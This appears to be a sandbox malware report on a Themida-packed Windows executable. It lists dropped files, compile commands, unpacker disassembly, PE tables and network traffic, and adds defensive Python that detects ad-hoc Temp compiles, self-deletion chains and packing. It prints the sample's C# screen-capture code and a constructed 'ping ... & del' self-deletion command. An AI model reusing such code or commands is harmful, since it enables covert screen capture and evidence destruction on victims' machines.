Preview:.using System;..using System.Collections.Generic;..using System.Drawing;..using System.Windows.Forms;....public class Screenshot..{.. public static List<Bitmap> CaptureScreens().. {.. var results = new List<Bitmap>();.. var allScreens = Screen.AllScreens;.... foreach (Screen screen in allScreens).. {.. try.. {.. Rectangle bounds = screen.Bounds;.. using (Bitmap bitmap = new Bitmap(bounds.Width, bounds.Height)).. {.. using (Graphics graphics = Graphics.FromImage(bitmap)).. {.. graphics.CopyFromScreen(new Point(bounds.Left, bounds.Top), Point.Empty, bounds.Size);.. }.... results.Add((Bitmap)bitmap.Clone());.. }.. }.. catch (Exception).. {.. // Handle any exceptions here.. }.. }.... return results;..
Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (604), with no line terminators
Category:dropped
Size (bytes):607
Entropy (8bit):5.309174708148683
Encrypted:false
SSDEEP:12:p37Lvkmb6KOkqe1xBkrk+ikOfwtWZEifwI:V3ka6KOkqeFkOfREifN
MD5:0FEAA4EA8189A039B243B5102A2A00A8
SHA1:D50E82EC8C0DDA85EB18EB43CA6AA1AB8D602239
SHA-256:190561506FB72D988D13E675EA4BBDB7B674529A482B609394CADB4065201366
SHA-512:EBAC656B0370AAE9D3866788B0EC746277F7AB3395BBC58CA055227DA7AEFA0A77047FE4D8B1611CB70AE203909219252268476975480C0FCA5C67E42149686D
Malicious:true
Reputation:unknown
Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll" /out:"C:\Users\user\AppData\Local\Temp\bifucm0t\bifucm0t.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\bifucm0t\bifucm0t.0.cs"
Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:dropped
Size (bytes):4096
Entropy (8bit):3.1471550848186847
Encrypted:false
SSDEEP:48:6r7oEAtf0KhzBU/Cf6mtJpN09tSpW1ulOa3aq:VNz0NmxO92AK
MD5:719CF98F3AC4821BBABF7DD3B1A11C71
                                                                                                                                                                                                                              SHA1:9F90E0DA18EEE79E52F8332711910157E0864CA9
                                                                                                                                                                                                                              SHA-256:125D9B204E259EB552184D228BBD5CA72E713EA4A98571316BF7FA7E22E9B279
                                                                                                                                                                                                                              SHA-512:BCE2C31A597F0F527174B565DA041B92E89E86F7A6592451F81173AFEE75211E1BE84533EECE412AB851B1DD726E6C75E3518C4144E952C42A2F3D33A9275381
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...P4zg...........!.................&... ...@....... ....................................@..................................%..K....@.......................`....................................................... ............... ..H............text...$.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................&......H.......<!...............................................................0..........s.....(...........8...........o.......(......(....s........(..........(......(....s....~......(....o........,...o........o....t....o........,...o.......&.....X.......i?k....*...(....B.(j........9.Q...........{.........(....*BSJB............v4.0.30319......l.......#~..........#Strings............#US.........#GUID...........#Blob...........G.........%3............................................
                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (706), with CRLF, CR line terminators
                                                                                                                                                                                                                              Category:modified
                                                                                                                                                                                                                              Size (bytes):1147
                                                                                                                                                                                                                              Entropy (8bit):5.483245337535983
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:KJfWvukqd3ka6KOkqeFkOfREifIKax5DqBVKVrdFAMBJTH:uWv5ika6NkqeFkyREuIK2DcVKdBJj
                                                                                                                                                                                                                              MD5:00C97A41FF5308765CB7222687DCB344
                                                                                                                                                                                                                              SHA1:C937DF114F8C0DB0AF1F154B19D45DC775C004D2
                                                                                                                                                                                                                              SHA-256:118AD0A421AE031920757A24556D1BA0BC65D1650A8B6678D88D734631EB3890
                                                                                                                                                                                                                              SHA-512:07692479B508A5E8A128A595A8E1E3BE2CDDC329FE8BC5E0314DEF64D0997D8CA979769E02280E51FDF7177C3D69D3829EF28BFDD6BAEE949431276ABAB5E58F
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:.C:\Users\user\AppData\Local\Temp\..........> "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll" /out:"C:\Users\user\AppData\Local\Temp\bifucm0t\bifucm0t.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\bifucm0t\bifucm0t.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer
                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):311
                                                                                                                                                                                                                              Entropy (8bit):4.782116412448049
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:PzpLwvmWxHLTSJALTSJALTSrcsWTo6wGv+wAFeMmvVOIHJFxMVlmJHaVFEG1vv:PdLw5pTcgTcgTLs4omvtAFSkIrxMVlmo
                                                                                                                                                                                                                              MD5:FEBAB6B333D59CB4A33F8A62C037B069
                                                                                                                                                                                                                              SHA1:6AB2A3A813CA84362DEB97A888F2A80BA03E6E9B
                                                                                                                                                                                                                              SHA-256:4AF7981B4686FA60A96081B801D8B11EBFF647CC07CDC2817D354DA84A392B69
                                                                                                                                                                                                                              SHA-512:502D531BEE3B707A4F57AF6F42B9A189AD9358CB004A41552BE298957DA7F9EC8F665641B4C728B90BBFBA5BC6B9A189A3F19049D2E450CE0EFA6072DEB522EB
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:..Pinging 760639 [::1] with 32 bytes of data:..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ....Ping statistics for ::1:.. Packets: Sent = 3, Received = 3, Lost = 0 (0% loss),..Approximate round trip times in milli-seconds:.. Minimum = 0ms, Maximum = 0ms, Average = 0ms..
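The two entries above, the csc.exe compile into %LOCALAPPDATA%\Temp and the PING.EXE output, are the on-disk side of two process-creation patterns that are easier to catch in endpoint telemetry than by file hash. The compiler command line (a `/t:library` build with a random `/out:` path under Temp and a reference set that includes System.Management.Automation.dll) is what Windows PowerShell's Add-Type hands to csc.exe when a script carries inline C#; the ping output with `Sent = 3` rather than the default four packets comes from a ping with an explicit count, the usual cheap sleep placed before a `del` of the original executable. The following Python is an added example, not Joe Sandbox output and not the sample's own code. It runs both checks over constructed process-creation records: the csc.exe command line is copied from the entry above, while the cmd.exe self-deletion line and the benign records are constructed stand-ins, since this section does not show the actual command line behind the ping output. It goes slightly beyond the report by also treating `timeout` as the delay step and `erase` as the delete step.

```python
"""Two process-creation checks for the artifacts in this report: an ad-hoc C#
compile into %LOCALAPPDATA%\\Temp (what PowerShell's Add-Type hands to csc.exe)
and a ping/timeout delay chained to del (self-deletion).  Added example; the
events below are constructed, only the csc.exe line is copied from the report."""
import re
from typing import Optional

LOOPBACK = {"127.0.0.1", "::1", "localhost"}
TEMP_OUT = re.compile(r'/out:"?[^"\s]*\\AppData\\Local\\Temp\\', re.IGNORECASE)
GAC_REF = re.compile(r'/R:"[^"]*\\([^\\"]+\.dll)"|/R:"([^\\"]+\.dll)"', re.IGNORECASE)
# Windows PowerShell's Add-Type references these three by default; anything else
# came from the script's own -ReferencedAssemblies.
ADD_TYPE_DEFAULTS = {"system.dll", "system.core.dll", "system.management.automation.dll"}


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].strip('"').lower()


def split_chain(cmdline: str) -> list:
    """Split a cmd.exe line on & and && outside double quotes; drop a leading 'cmd /c'."""
    segs, cur, in_quote, i = [], [], False, 0
    while i < len(cmdline):
        ch = cmdline[i]
        if ch == '"':
            in_quote = not in_quote
        if ch == "&" and not in_quote:
            segs.append("".join(cur).strip())
            cur = []
            if cmdline[i:i + 2] == "&&":
                i += 1
        else:
            cur.append(ch)
        i += 1
    segs.append("".join(cur).strip())
    segs = [s for s in segs if s]
    if segs:
        segs[0] = re.sub(r'^"?(?:[^"\s]*\\)?cmd(?:\.exe)?"?\s+/[ck]\s+', "", segs[0], flags=re.I)
    return segs


def verb(segment: str) -> str:
    parts = segment.split()
    return re.sub(r"\.exe$", "", basename(parts[0])) if parts else ""


def self_delete_chain(cmdline: str) -> Optional[dict]:
    """ping <loopback> / ping -n / timeout, followed later in the same chain by del or erase."""
    segs, delay_idx = split_chain(cmdline), None
    for i, seg in enumerate(segs):
        v, toks = verb(seg), seg.lower().split()
        if v in ("ping", "timeout") and delay_idx is None:
            if v == "timeout" or "-n" in toks or any(t in LOOPBACK for t in toks):
                delay_idx = i
        elif v in ("del", "erase") and delay_idx is not None:
            quoted = re.search(r'"([^"]+)"', seg)
            return {"rule": "ping_del_self_delete", "delay": segs[delay_idx], "delete": seg,
                    "target": quoted.group(1) if quoted else seg.split()[-1]}
    return None


def adhoc_compile(rec: dict) -> Optional[dict]:
    """csc.exe or vbc.exe writing its output under the user's Temp directory."""
    if basename(rec["image"]) not in ("csc.exe", "vbc.exe") or not TEMP_OUT.search(rec["cmdline"]):
        return None
    refs = [(a or b).lower() for a, b in GAC_REF.findall(rec["cmdline"])]
    parent = basename(rec.get("parent_image", ""))
    return {"rule": "adhoc_compile_from_temp", "parent": parent,
            "via_add_type": parent in ("powershell.exe", "pwsh.exe")
            and "system.management.automation.dll" in refs,
            "extra_refs": [r for r in refs if r not in ADD_TYPE_DEFAULTS]}


def triage(events: list) -> list:
    findings = []
    for idx, rec in enumerate(events):
        hit = adhoc_compile(rec)
        if hit is None and basename(rec["image"]) == "cmd.exe":
            hit = self_delete_chain(rec["cmdline"])
        if hit:
            hit["event"] = idx
            findings.append(hit)
    return findings


SAMPLE_EVENTS = [  # constructed records; event 0's command line is the one from the report
    {"parent_image": r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
     "image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe",
     "cmdline": (r'"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" '
                 r'/R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" '
                 r'/R:"System.Core.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll" '
                 r'/R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll" '
                 r'/out:"C:\Users\user\AppData\Local\Temp\bifucm0t\bifucm0t.dll" /debug- /optimize+ /warnaserror /optimize+ '
                 r'"C:\Users\user\AppData\Local\Temp\bifucm0t\bifucm0t.0.cs"')},
    {"parent_image": r"C:\Program Files\Microsoft Visual Studio\MSBuild.exe",  # benign build
     "image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe",
     "cmdline": r'csc.exe /t:library /out:"C:\src\app\bin\Release\app.dll" "C:\src\app\Program.cs"'},
    {"parent_image": r"C:\Users\user\Desktop\KpHYfxnJs6.exe",  # constructed self-deletion chain
     "image": r"C:\Windows\SysWOW64\cmd.exe",
     "cmdline": r'"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 3 > Nul & del /f /q "C:\Users\user\Desktop\KpHYfxnJs6.exe"'},
    {"parent_image": r"C:\Windows\explorer.exe",  # benign ping without a delete
     "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"cmd.exe /c ping 10.0.0.5 -n 2 && echo reachable"},
]

if __name__ == "__main__":
    for finding in triage(SAMPLE_EVENTS):
        print(finding)
```

Neither rule is a conviction on its own: Add-Type compiles are common in administrative scripts, so the compile finding should be joined to its parent PowerShell process and to whatever else that session did. The pivots the code returns are the ones worth chasing: the parent image, the extra `/R:` references the script asked for (System.Drawing and System.Windows.Forms in this case) and the path the chain deletes, which identifies the original dropper even after it is gone from disk.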
File type:PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):7.993792447458598
TrID:
• Win32 Executable (generic) a (10002005/4) 99.96%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:KpHYfxnJs6.exe
File size:9'081'534 bytes
MD5:41b147fd16a94a8ea6164177cf91733c
SHA1:f586388782d636b286ef606de997087f451fe11f
SHA256:6a595507f7b92e6af81d2c67f310629a552de261ed6e6e2a2170b71a7503ed31
SHA512:c15b8cc463186471a12431131d90733f9389d2eded969ee056b1bfe391ab255fc88c4f1b896e05dc6d4f94cba82bf066316fca489047781e13ddfd522e9e5da0
SSDEEP:196608:lPWgT2X83i4bCFRu3TN9hoy6Enwc4GgpG0REtHIrq7L3mrbW3jmy+:lDKXe0c3jWyotGgpGLtz7bmrbmyJ
TLSH:9296331696F24C81D09328BAE469BD9507716B055FC22FB0E66F6343C04F3385E76ABE
File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$................................................C%......C.......C.......C..................+....B.......B......Rich...................
Icon Hash:90cececece8e8eb0
Entrypoint:0x88c058
Entrypoint Section:.boot
Digitally signed:false
Imagebase:0x400000
Subsystem:windows gui
Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
DLL Characteristics:GUARD_CF, TERMINAL_SERVER_AWARE
Time Stamp:0x6779EE8D [Sun Jan 5 02:29:33 2025 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:6
OS Version Minor:0
File Version Major:6
File Version Minor:0
Subsystem Version Major:6
Subsystem Version Minor:0
Import Hash:a413ffcb413e398d1f798a0daa527855
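The static block above carries the signals an analyst checks before reading the entrypoint disassembly: file entropy 7.99 of a possible 8.0, an entrypoint in a `.boot` section rather than `.text`, no Authenticode signature, and a link timestamp of 5 January 2025. Together they say the code at the entrypoint is an unpacking stub and the real payload sits compressed or encrypted behind it. The following Python is an added example, not Joe Sandbox's code and not the sample, that reproduces those checks with the standard library alone: it reads the COFF header, AddressOfEntryPoint and the section table at their PE/COFF offsets, computes 8-bit Shannon entropy per section and for the whole file, decodes TimeDateStamp, and flags section names with non-printable characters. The input is a constructed minimal PE32 produced by `build_sample_pe`, a helper that exists only for this example; the synthetic file has its entrypoint in a `.boot` section, a payload section of exactly 8.0 bits of entropy, a section whose name contains control bytes, and the report's timestamp 0x6779EE8D.

```python
"""Packing heuristics read straight from PE headers, standard library only.
Added example; the PE it analyses is constructed below, not the report's sample."""
import math
import struct
from datetime import datetime, timezone

CODE_SECTIONS = {".text", "code", ".code", "text"}
HIGH_ENTROPY = 7.2  # bits per byte; 8.0 is the maximum, compressed/encrypted data sits near it


def entropy(data: bytes) -> float:
    """Shannon entropy in bits per byte, the report's 'Entropy (8bit)'."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def parse_pe(blob: bytes) -> dict:
    """COFF header, AddressOfEntryPoint and the section table (PE/COFF offsets)."""
    if blob[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    e_lfanew = struct.unpack_from("<I", blob, 0x3C)[0]
    if blob[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    machine, nsections, tstamp, _, _, opt_size, _ = struct.unpack_from("<HHIIIHH", blob, coff)
    opt = coff + 20
    entry_rva = struct.unpack_from("<I", blob, opt + 16)[0]  # same offset in PE32 and PE32+
    sections = []
    for i in range(nsections):
        raw_name, vsize, va, raw_size, raw_ptr = struct.unpack_from("<8sIIII", blob, opt + opt_size + 40 * i)
        name = raw_name.rstrip(b"\0")
        sections.append({
            "name": name.decode("latin-1"),
            "printable_name": bool(name) and all(0x21 <= b < 0x7F for b in name),
            "va": va, "span": max(vsize, raw_size),
            "entropy": entropy(blob[raw_ptr:raw_ptr + raw_size]),
        })
    return {"machine": machine, "timestamp": tstamp, "entry_rva": entry_rva, "sections": sections}


def packing_report(blob: bytes) -> dict:
    pe = parse_pe(blob)
    ep_sec = next((s for s in pe["sections"] if s["va"] <= pe["entry_rva"] < s["va"] + s["span"]), None)
    flags = []
    if ep_sec is None:
        flags.append("entrypoint_outside_any_section")
    elif ep_sec["name"].lower() not in CODE_SECTIONS:
        flags.append(f"entrypoint_in:{ep_sec['name']}")
    for s in pe["sections"]:
        if not s["printable_name"]:
            flags.append("section_name_special_chars")
        if s["entropy"] >= HIGH_ENTROPY:
            flags.append(f"high_entropy_section:{s['name']}")
    if entropy(blob) >= HIGH_ENTROPY:
        flags.append("high_entropy_file")
    return {
        "entry_section": ep_sec["name"] if ep_sec else None,
        "timestamp_utc": datetime.fromtimestamp(pe["timestamp"], tz=timezone.utc).strftime("%Y-%m-%d %H:%M:%S"),
        "section_entropy": {s["name"]: round(s["entropy"], 3) for s in pe["sections"]},
        "flags": flags,
        "likely_packed": any(f.startswith(("entrypoint_in", "high_entropy")) for f in flags),
    }


def build_sample_pe(sections, entry_rva: int, timestamp: int) -> bytes:
    """Assemble a minimal PE32 as constructed test input (hypothetical helper, not a real linker)."""
    file_align, opt_size = 0x200, 0xE0
    hdr_end = 0x40 + 4 + 20 + opt_size + 40 * len(sections)
    hdr_size = -(-hdr_end // file_align) * file_align
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)                                    # e_lfanew
    coff = struct.pack("<HHIIIHH", 0x14C, len(sections), timestamp, 0, 0, opt_size, 0x0102)
    opt = bytearray(opt_size)
    struct.pack_into("<H", opt, 0, 0x10B)                                     # PE32 magic
    struct.pack_into("<I", opt, 16, entry_rva)                                # AddressOfEntryPoint
    struct.pack_into("<I", opt, 28, 0x400000)                                 # ImageBase
    struct.pack_into("<II", opt, 32, 0x1000, file_align)                      # Section/FileAlignment
    headers, bodies, raw_ptr = bytearray(), bytearray(), hdr_size
    for name, rva, data in sections:
        raw_size = -(-len(data) // file_align) * file_align
        headers += struct.pack("<8sIIIIIIHHI", name.ljust(8, b"\0"), len(data), rva,
                               raw_size, raw_ptr, 0, 0, 0, 0, 0x60000020)
        bodies += data.ljust(raw_size, b"\0")
        raw_ptr += raw_size
    return bytes((dos + b"PE\0\0" + coff + opt + headers).ljust(hdr_size, b"\0") + bodies)


SAMPLE = build_sample_pe(
    [(b".text", 0x1000, b"\xC3" * 16),                 # tiny, low entropy
     (b"\x01\x02\xFF\xFE", 0x2000, b"\0" * 32),       # section name with special chars
     (b".boot", 0x3000, bytes(range(256)) * 8)],       # 2 KiB, entropy exactly 8.0
    entry_rva=0x3058, timestamp=0x6779EE8D)

if __name__ == "__main__":
    print(packing_report(SAMPLE))
```

Against the real file, `packing_report(open(path, "rb").read())` yields the same fields the report shows. The per-section figure is the one to watch: a packer that keeps headers and a small loader in the clear can still push one section to 7.9 while the file-wide average looks less alarming, and an entrypoint that resolves to anything other than the code section is a stronger tell than the average alone.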
Instruction
call 00007FD46CBE7670h
push ebx
mov ebx, esp
push ebx
mov esi, dword ptr [ebx+08h]
mov edi, dword ptr [ebx+10h]
cld
mov dl, 80h
mov al, byte ptr [esi]
inc esi
mov byte ptr [edi], al
inc edi
mov ebx, 00000002h
add dl, dl
jne 00007FD46CBE7527h
mov dl, byte ptr [esi]
inc esi
adc dl, dl
jnc 00007FD46CBE750Ch
add dl, dl
jne 00007FD46CBE7527h
mov dl, byte ptr [esi]
inc esi
adc dl, dl
jnc 00007FD46CBE7573h
xor eax, eax
add dl, dl
jne 00007FD46CBE7527h
mov dl, byte ptr [esi]
inc esi
adc dl, dl
jnc 00007FD46CBE7607h
add dl, dl
jne 00007FD46CBE7527h
mov dl, byte ptr [esi]
inc esi
adc dl, dl
adc eax, eax
add dl, dl
jne 00007FD46CBE7527h
mov dl, byte ptr [esi]
inc esi
adc dl, dl
adc eax, eax
add dl, dl
jne 00007FD46CBE7527h
mov dl, byte ptr [esi]
inc esi
                                                                                                                                                                                                                              adc dl, dl
                                                                                                                                                                                                                              adc eax, eax
                                                                                                                                                                                                                              add dl, dl
                                                                                                                                                                                                                              jne 00007FD46CBE7527h
                                                                                                                                                                                                                              mov dl, byte ptr [esi]
                                                                                                                                                                                                                              inc esi
                                                                                                                                                                                                                              adc dl, dl
                                                                                                                                                                                                                              adc eax, eax
                                                                                                                                                                                                                              je 00007FD46CBE752Ah
                                                                                                                                                                                                                              push edi
                                                                                                                                                                                                                              mov eax, eax
                                                                                                                                                                                                                              sub edi, eax
                                                                                                                                                                                                                              mov al, byte ptr [edi]
                                                                                                                                                                                                                              pop edi
                                                                                                                                                                                                                              mov byte ptr [edi], al
                                                                                                                                                                                                                              inc edi
                                                                                                                                                                                                                              mov ebx, 00000002h
                                                                                                                                                                                                                              jmp 00007FD46CBE74BBh
                                                                                                                                                                                                                              mov eax, 00000001h
                                                                                                                                                                                                                              add dl, dl
                                                                                                                                                                                                                              jne 00007FD46CBE7527h
                                                                                                                                                                                                                              mov dl, byte ptr [esi]
                                                                                                                                                                                                                              inc esi
                                                                                                                                                                                                                              adc dl, dl
                                                                                                                                                                                                                              adc eax, eax
                                                                                                                                                                                                                              add dl, dl
                                                                                                                                                                                                                              jne 00007FD46CBE7527h
                                                                                                                                                                                                                              mov dl, byte ptr [esi]
                                                                                                                                                                                                                              inc esi
                                                                                                                                                                                                                              adc dl, dl
                                                                                                                                                                                                                              jc 00007FD46CBE750Ch
                                                                                                                                                                                                                              sub eax, ebx
                                                                                                                                                                                                                              mov ebx, 00000001h
                                                                                                                                                                                                                              jne 00007FD46CBE754Ah
                                                                                                                                                                                                                              mov ecx, 00000001h
                                                                                                                                                                                                                              add dl, dl
                                                                                                                                                                                                                              jne 00007FD46CBE7527h
                                                                                                                                                                                                                              mov dl, byte ptr [esi]
                                                                                                                                                                                                                              inc esi
                                                                                                                                                                                                                              adc dl, dl
                                                                                                                                                                                                                              adc ecx, ecx
                                                                                                                                                                                                                              add dl, dl
                                                                                                                                                                                                                              jne 00007FD46CBE7527h
                                                                                                                                                                                                                              mov dl, byte ptr [esi]
                                                                                                                                                                                                                              inc esi
                                                                                                                                                                                                                              adc dl, dl
                                                                                                                                                                                                                              jc 00007FD46CBE750Ch
                                                                                                                                                                                                                              push esi
                                                                                                                                                                                                                              mov esi, edi
                                                                                                                                                                                                                              sub esi, ebp
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x3e083 | 0xa4 | .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x3f000 | 0x950 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
 | 0x1000 | 0x26224 | 0x16800 | fd694dd45a4b04a8bbbf98600e09367e | False | 0.9997178819444444 | OpenPGP Public Key | 7.970952206496813 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
 | 0x28000 | 0xd8d2 | 0x7a00 | 054d3a0f495771bee612675e6dca2199 | False | 0.9841188524590164 | data | 7.935438613469344 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
 | 0x36000 | 0x48e4 | 0x200 | 808aba42bb9c184f932e258fb926c4c5 | False | 0.93359375 | data | 7.011148749822864 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
 | 0x3b000 | 0x94c | 0x600 | db2985095e26f6072509799f1e129852 | False | 0.78515625 | data | 6.594909833488607 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
 | 0x3c000 | 0x1ea4 | 0x1c00 | b7cfe11e640d100aa9e3226902e917ee | False | 0.9835379464285714 | data | 7.861185148745885 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
.idata | 0x3e000 | 0x1000 | 0x200 | 23fa6391fbf2c8599d965f756bd54553 | False | 0.32421875 | data | 2.4842952593420575 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x3f000 | 0x1000 | 0xa00 | 3538a3b76aecf666de9cd2f4c3fa0cca | False | 0.422265625 | data | 4.694891787958566 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.themida | 0x40000 | 0x44c000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.boot | 0x48c000 | 0x2bac00 | 0x2bac00 | 05f7d59d13a919acc25f7f4a6e7e652c | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_VERSION | 0x3f090 | 0x39c | data | | | 0.4512987012987013
RT_MANIFEST | 0x3f43c | 0x50d | XML 1.0 document, ASCII text | English | United States | 0.4694508894044857
DLL | Import
kernel32.dll | GetModuleHandleA
USER32.dll | CreateWindowExW
COMCTL32.dll |
ADVAPI32.dll | OpenProcessToken
GDI32.dll | SelectObject
Language of compilation system | Country where language is spoken
English | United States
                                                                                                                                                                                                                              Jan 5, 2025 07:19:59.696024895 CET44350007162.159.137.232192.168.2.4
                                                                                                                                                                                                                              Jan 5, 2025 07:19:59.696070910 CET50007443192.168.2.4162.159.137.232
                                                                                                                                                                                                                              Jan 5, 2025 07:19:59.696077108 CET44350007162.159.137.232192.168.2.4
                                                                                                                                                                                                                              Jan 5, 2025 07:19:59.696218014 CET50007443192.168.2.4162.159.137.232
                                                                                                                                                                                                                              Jan 5, 2025 07:19:59.696249962 CET44350007162.159.137.232192.168.2.4
                                                                                                                                                                                                                              Jan 5, 2025 07:19:59.696391106 CET50007443192.168.2.4162.159.137.232
                                                                                                                                                                                                                              Jan 5, 2025 07:19:59.696405888 CET44350007162.159.137.232192.168.2.4
                                                                                                                                                                                                                              Jan 5, 2025 07:19:59.696608067 CET50007443192.168.2.4162.159.137.232
                                                                                                                                                                                                                              Jan 5, 2025 07:19:59.696624041 CET44350007162.159.137.232192.168.2.4
                                                                                                                                                                                                                              Jan 5, 2025 07:19:59.696909904 CET50007443192.168.2.4162.159.137.232
                                                                                                                                                                                                                              Jan 5, 2025 07:19:59.697160006 CET50007443192.168.2.4162.159.137.232
                                                                                                                                                                                                                              Jan 5, 2025 07:19:59.697427988 CET50007443192.168.2.4162.159.137.232
                                                                                                                                                                                                                              Jan 5, 2025 07:19:59.697650909 CET50007443192.168.2.4162.159.137.232
